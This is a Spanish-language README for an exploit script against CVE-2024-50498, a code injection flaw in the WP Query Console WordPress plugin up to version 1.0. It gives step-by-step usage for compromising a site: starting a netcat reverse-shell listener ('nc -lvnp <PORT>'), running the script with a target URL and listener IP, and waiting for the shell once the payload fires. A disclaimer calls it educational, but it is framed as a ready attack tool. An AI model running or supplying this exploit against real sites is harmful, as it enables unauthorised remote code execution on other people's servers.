
Script de explotación para la inyección de código CVE-2024-50498 en WordPress WP Query Console que comprueba la vulnerabilidad y entrega una reverse shell.
La vulnerabilidad de Control Inadecuado de Generación de Código ('Code Injection') en LUBUS WP Query Console permite la inyección de código. Este problema afecta a WP Query Console: desde n/a hasta 1.0.
Abre una terminal en tu máquina e inicia un listener de Netcat para esperar la conexión de reverse shell.
nc -lvnp <PORT>
usage: CVE-2024-50498.py [-h] -u URL -ip LISTENER_IP -P PORT
wordpress | Improper Control of Generation of Code ('Code Injection') vulnerability in LUBUS WP Query Console allows Code
Injection.This issue affects WP Query Console: from n/a through 1.0. script Exploit by: Nxploit Khaled_alenazi This script
is provided for educational purposes only. The author is not responsible for any damages caused by the misuse of this
script.
options:
-h, --help show this help message and exit
-u URL, --url URL Target URL (e.g., http://example.com/wordpress)
-ip LISTENER_IP, --listener_ip LISTENER_IP
Your IP address for listening.
-P PORT, --port PORT Your listening port.
Después de ejecutar el comando, supervisa la terminal de Netcat para ver la conexión de reverse shell.
El script primero comprobará si el sitio es vulnerable buscando la versión del plugin. Si es vulnerable, envía un payload para activar la reverse shell. Si tiene éxito, revisa tu terminal de Netcat para ver la conexión de shell.